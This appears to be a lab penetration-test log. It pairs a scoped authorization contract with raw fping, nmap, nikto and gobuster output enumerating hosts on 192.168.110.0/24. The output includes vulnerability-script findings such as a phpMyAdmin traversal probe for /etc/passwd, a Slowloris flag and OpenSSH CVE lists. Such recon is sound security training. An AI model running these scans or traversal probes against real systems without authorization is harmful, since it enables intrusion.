We have been hired to conduct a penetration test. Here is our contract:
Contract
Customer / Emergency contact
Ralph Maurer, ralph.maurer@gibb.ch, +41 00 000 000
Contractor
-- your name --, email@osstmm.ch, +41 00 000 000
Statement of work
§ The contractor is hereby authorized to perform a penetration test of the network 192.168.110.0/24 between the 5th of November and the 1st of December 2022 and is exempt from all liability
§ Analysis: identify and verify vulnerabilities in target network
§ Scope: All identifiable hosts in target network 192.168.110.0/24
§ Attacker-IP: 192.168.120.51
§ Attack Vector: Attacker-IP → Gateway (192.168.120.1) → Target-Network
§ Test type: Blind / Black Box (https://thecyphere.com/blog/types-penetration-testing/)
Limits / prohibited actions:
§ Denial of service attacks are prohibited
§ No sniffing or ARP-spoofing
§ Exploitation of vulnerabilities may not be attempted without the explicit consent of the customer
192.168.110.1
192.168.110.40 ???
192.168.110.60
192.168.110.72
192.168.110.73
192.168.110.80
192.168.110.120
192.168.110.135
192.168.110.250
Network: 192.168.110.0/24
sudo fping -qasg 192.168.110.0/24
192.168.110.1
192.168.110.60
192.168.110.73
192.168.110.120
192.168.110.135
192.168.110.250
254 targets
6 alive
248 unreachable
0 unknown addresses
992 timeouts (waiting for response)
998 ICMP Echos sent
6 ICMP Echo Replies received
11 other ICMP received
0.483 ms (min round trip time)
0.605 ms (avg round trip time)
0.802 ms (max round trip time)
9.797 sec (elapsed real time)
sudo nmap -PEPM -sn -n 192.168.110.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 09:29 CET
Nmap scan report for 192.168.110.1
Host is up (0.00087s latency).
Nmap scan report for 192.168.110.60
Host is up (0.0014s latency).
Nmap scan report for 192.168.110.73
Host is up (0.00098s latency).
Nmap scan report for 192.168.110.120
Host is up (0.00063s latency).
Nmap scan report for 192.168.110.135
Host is up (0.00055s latency).
Nmap scan report for 192.168.110.250
Host is up (0.00039s latency).
Nmap done: 256 IP addresses (6 hosts up) scanned in 1.32 seconds
sudo nmap -sV -T4 -Pn 192.168.110.0/24 -oA Scoping/host_discovery/nmap/tcp_fastscan
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 09:50 CET
Nmap scan report for 192.168.110.0
Host is up.
All 1000 scanned ports on 192.168.110.0 are filtered
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Host is up (0.000037s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Unbound
81/tcp open http Apache httpd
222/tcp open ssh OpenSSH 8.6 (protocol 2.0)
444/tcp open ssl/http Apache httpd
Nmap scan report for li212-vmKL.smartlearn.lan (192.168.110.40)
Host is up.
All 1000 scanned ports on li212-vmKL.smartlearn.lan (192.168.110.40) are filtered
Nmap scan report for 192.168.110.60
Host is up (0.00059s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
3306/tcp open http nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.72
Host is up (0.00083s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MySQL 5.7.35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.73
Host is up (0.00044s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.80
Host is up (0.00063s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
3306/tcp open mysql MySQL 8.0.26-0ubuntu0.20.04.2
8080/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.120
Host is up (0.00049s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.135
Host is up (0.00071s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.250
Host is up (0.0012s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (256 hosts up) scanned in 396.74 seconds
Nmap 7.91 scan initiated Sat Nov 19 09:50:12 2022 as: nmap -sV -T4 -Pn -oA Scoping/host_discovery/nmap/tcp_fastscan 192.168.110.0/24
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Unbound
81/tcp open http Apache httpd
222/tcp open ssh OpenSSH 8.6 (protocol 2.0)
444/tcp open ssl/http Apache httpd
Nmap scan report for li212-vmKL.smartlearn.lan (192.168.110.40)
Nmap scan report for 192.168.110.60
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
3306/tcp open http nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.72
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MySQL 5.7.35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.73
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.80
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
3306/tcp open mysql MySQL 8.0.26-0ubuntu0.20.04.2
8080/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.120
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.135
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.250
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 19 09:56:49 2022 -- 256 IP addresses (256 hosts up) scanned in 396.74 seconds
sudo nmap -sV -T4 -Pn -p- 192.168.110.0/24 -oA Scoping/host_discovery/nmap/tcp_fullfastscan
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 09:51 CET
Nmap scan report for 192.168.110.0
Host is up.
All 65535 scanned ports on 192.168.110.0 are filtered
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Host is up (0.00024s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Unbound
81/tcp open http Apache httpd
222/tcp open ssh OpenSSH 8.6 (protocol 2.0)
444/tcp open ssl/http Apache httpd
1013/tcp open http Apache httpd
Nmap scan report for li212-vmKL.smartlearn.lan (192.168.110.40)
Host is up.
All 65535 scanned ports on li212-vmKL.smartlearn.lan (192.168.110.40) are filtered
Nmap scan report for 192.168.110.60
Host is up (0.00043s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
3306/tcp open http nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.72
Host is up (0.0035s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MySQL 5.7.35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.73
Host is up (0.00047s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.80
Host is up (0.00072s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
3306/tcp open mysql MySQL 8.0.26-0ubuntu0.20.04.2
8080/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.120
Host is up (0.0048s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
20021/tcp open ftp vsftpd 3.0.3
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.135
Host is up (0.00078s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.110.250
Host is up (0.00044s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (256 hosts up) scanned in 13632.12 seconds
sudo nmap -sU -sV --version-intensity 0 -F -n 192.168.110.0/24 -oA Scoping/host_discovery/nmap/nmap_udp
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 09:38 CET
Nmap scan report for 192.168.110.1
Host is up (0.00046s latency).
Not shown: 97 closed ports
PORT STATE SERVICE VERSION
53/udp open domain Unbound
123/udp open ntp NTP v4 (secondary server)
514/udp open|filtered tcpwrapped
Nmap scan report for 192.168.110.60
Host is up (0.00081s latency).
All 100 scanned ports on 192.168.110.60 are closed
Nmap scan report for 192.168.110.72
Host is up (0.00057s latency).
Not shown: 99 closed ports
PORT STATE SERVICE VERSION
69/udp open tftp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port69-UDP:V=7.91%I=0%D=11/19%Time=6378968B%P=x86_64-pc-linux-gnu%r(DNS
SF:StatusRequest,40,"Welcome\x20to\x20UDP\x20backup\x20server\x20by\x20hax
SF:x0r\x20v0\.1,\x20say\x20help\x20for\x20help\.\n");
Nmap scan report for 192.168.110.73
Host is up (0.00071s latency).
All 100 scanned ports on 192.168.110.73 are closed
Nmap scan report for 192.168.110.120
Host is up (0.00079s latency).
All 100 scanned ports on 192.168.110.120 are closed
Nmap scan report for 192.168.110.135
Host is up (0.00070s latency).
All 100 scanned ports on 192.168.110.135 are closed
Nmap scan report for 192.168.110.250
Host is up (0.00079s latency).
Not shown: 99 closed ports
PORT STATE SERVICE VERSION
53/udp open domain ISC BIND 9.16.1 (Ubuntu Linux)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (7 hosts up) scanned in 113.51 seconds
sudo nmap -sU -sV --version-intensity 0 192.168.110.0/24 -oA Scoping/host_discovery/nmap/nmap_udp_full
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 09:48 CET
Warning: 192.168.110.1 giving up on port because retransmission cap hit (10).
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Host is up (0.00072s latency).
Not shown: 922 closed ports, 76 open|filtered ports
PORT STATE SERVICE VERSION
53/udp open domain Unbound
123/udp open ntp NTP v4 (secondary server)
Nmap scan report for 192.168.110.60
Host is up (0.00062s latency).
All 1000 scanned ports on 192.168.110.60 are closed
Nmap scan report for 192.168.110.72
Host is up (0.0015s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
69/udp open tftp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port69-UDP:V=7.91%I=0%D=11/19%Time=6378A4F8%P=x86_64-pc-linux-gnu%r(DNS
SF:StatusRequest,40,"Welcome\x20to\x20UDP\x20backup\x20server\x20by\x20hax
SF:x0r\x20v0\.1,\x20say\x20help\x20for\x20help\.\n");
Nmap scan report for 192.168.110.73
Host is up (0.00079s latency).
All 1000 scanned ports on 192.168.110.73 are closed
Nmap scan report for 192.168.110.120
Host is up (0.00089s latency).
All 1000 scanned ports on 192.168.110.120 are closed
Nmap scan report for 192.168.110.135
Host is up (0.00056s latency).
All 1000 scanned ports on 192.168.110.135 are closed
Nmap scan report for 192.168.110.250
Host is up (0.00059s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
53/udp open domain ISC BIND 9.16.1 (Ubuntu Linux)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (7 hosts up) scanned in 3223.23 seconds
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.1 -oA machines/192_168_110_1/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 10:47 CET
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Host is up (0.00028s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Unbound
81/tcp open http Apache httpd
222/tcp open ssh OpenSSH 8.6 (protocol 2.0)
444/tcp open ssl/http Apache httpd
1013/tcp open http Apache httpd
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.80 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 192.168.110.1 -oA machines/192_168_110_1/enumeration/nmap/nmap_udp_fullfast
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:19 CET
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Host is up (0.00055s latency).
Not shown: 952 closed ports, 46 open|filtered ports
PORT STATE SERVICE VERSION
53/udp open domain Unbound
123/udp open ntp NTP v4 (secondary server)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1031.28 seconds
nmap 192.168.110.1 -sV -oA 192_168_110_1/enumeration/nmap/vuln --script vuln -T5 -p1013
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 11:57 CET
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Host is up (0.00033s latency).
PORT STATE SERVICE VERSION
1013/tcp open http Apache httpd
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /cgi-bin/: Potentially interesting folder
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2005-3299
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
| Disclosure date: 2005-10-nil
| Extra information:
| ../../../../../etc/passwd not found.
|
| References:
| http://www.exploit-db.com/exploits/1244/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_http-server-header: Apache
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 360.41 seconds
nmap 192.168.110.1 -sV -oA 192_168_110_1/enumeration/nmap/vuln --script vuln -T5 -p53,81,222,444,1013
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:05 CET
Nmap scan report for if225-vmLF.smartlearn.lan (192.168.110.1)
Host is up (0.00035s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Unbound
81/tcp open http Apache httpd
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
222/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.6:
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
444/tcp open ssl/http Apache httpd
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /cgi-bin/mj_wwwusr: Majordomo2 Mailing List (401 Unauthorized)
| /cgi-bin/vcs: Mitel Audio and Web Conferencing (AWC) (401 Unauthorized)
| /cgi-bin/ffileman.cgi?: Ffileman Web File Manager (401 Unauthorized)
| /cgi-bin/ck/mimencode: ContentKeeper Web Appliance (401 Unauthorized)
| /cgi-bin/masterCGI?: Alcatel-Lucent OmniPCX Enterprise (401 Unauthorized)
| /cgi-bin/awstats.pl: AWStats (401 Unauthorized)
| /cgi-bin/image/shikaku2.png: TeraStation PRO RAID 0/1/5 Network Attached Storage (401 Unauthorized)
|_ /cgi-bin/: Potentially interesting folder (401 Unauthorized)
|_http-server-header: Apache
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
1013/tcp open http Apache httpd
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /cgi-bin/: Potentially interesting folder
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2005-3299
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
| Disclosure date: 2005-10-nil
| Extra information:
| ../../../../../etc/passwd not found.
|
| References:
| http://www.exploit-db.com/exploits/1244/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_http-server-header: Apache
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 369.29 seconds
sudo nmap -sV -T4 -Pn -p- -O 192.168.110.60 -oA machines/192_168_110_60/enumeration/nmap/nmap_fullfast
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-19 11:30 CET
Nmap scan report for 192.168.110.60
Host is up (0.00059s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
3306/tcp open http nginx 1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.45 seconds
sudo nmap -sUV -T4 -p1-1000 --version-intensity 0 192.168.110.60 -oA machines/192_168_110_60/enumeration/nmap/nmap_udp_fullfast
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-20 18:09 CET
Warning: 192.168.110.60 giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.110.60
Host is up (0.00082s latency).
All 1000 scanned ports on 192.168.110.60 are closed (967) or open|filtered (33)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1046.68 seconds
sudo nmap 192.168.110.60 -sV -oA 192_168_110_60/enumeration/nmap/ftp --script "safe and ftp-*" -T5 -p21
Starting Nmap 7.91 ( https://nmap.org ) at 2022-12-11 07:28 CET
Nmap scan report for 192.168.110.60
Host is up (0.00076s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.74 seconds
nikto -h 192.168.110.60
---------------------------------------------------------------------------
+ Target IP: 192.168.110.60
+ Target Hostname: 192.168.110.60
+ Target Port: 80
+ Start Time: 2022-12-10 10:20:14 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5cbf4c736a5c7, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ 7916 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-12-10 10:21:00 (GMT1) (46 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
nikto -h 192.168.110.60 -p 3306
---------------------------------------------------------------------------
+ Target IP: 192.168.110.60
+ Target Hostname: 192.168.110.60
+ Target Port: 3306
+ Start Time: 2022-12-10 10:08:28 (GMT1)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7917 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2022-12-10 10:08:36 (GMT1) (8 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
gobuster dir -u http://192.168.110.60:3306 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.110.60:3306
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/12/10 10:10:00 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 4369]
===============================================================
2022/12/10 10:10:00 Finished
===============================================================
sudo nmap 192.168.110.60 -sV -oA 192_168_110_60/enumeration/nmap/vuln --script vuln -T5 -p21,22,80,443,3306
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-26 12:07 CET
Nmap scan report for 192.168.110.60
Host is up (0.00074s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
|_sslv2-drown:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.41 (Ubuntu)
